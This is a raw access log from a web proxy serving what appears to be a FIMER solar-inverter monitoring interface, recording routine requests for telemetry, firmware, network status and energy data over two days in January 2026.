- 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.47.86] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.47.86] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.47.86] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.47.86] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:03 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1684] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:04 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:08 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1688] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:09 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:13 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1685] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768431599999&bin=week_of_year&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768431599999&bin=month_of_year&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768431599999&bin=yearly&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.47.86] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.47.86] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.47.86] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.47.86] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.47.86] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.47.86] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.47.86] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.47.86] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.47.86] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:39:02 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:39:02 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.42.50] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.42.50] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.42.50] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.42.50] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.42.50] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.42.50] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.42.50] [Length 1683] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.42.50] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.42.50] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:43 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.42.50] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:44 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.42.50] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:44 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.42.50] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.42.50] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.42.50] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.42.50] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.42.50] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.42.50] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:13:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.42.50] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.42.50] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.42.50] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.42.50] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.42.50] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.42.50] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.42.50] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.42.50] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.42.50] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:15:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.42.50] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:16:03 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.42.50] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:08:16:03 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.42.50] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:09:17:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.44.243] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:09:17:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768431599999&bin=week_of_year&aggregation=diff" [Client 37.76.44.243] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:09:17:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.44.243] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:09:17:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.44.243] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:06 +0000] - 200 200 - GET http fimer.profibot.hu "/" [Client 84.1.26.27] [Length 1663] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[15/Jan/2026:07:48:06 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.css?version=1729759760754" [Client 84.1.26.27] [Length 595] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:06 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.css?5470dfb553c45ab13d14" [Client 84.1.26.27] [Length 595] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:06 +0000] - 200 200 - GET http fimer.profibot.hu "/index.css?5470dfb553c45ab13d14" [Client 84.1.26.27] [Length 46644] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.es6.js?5470dfb553c45ab13d14" [Client 84.1.26.27] [Length 487] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 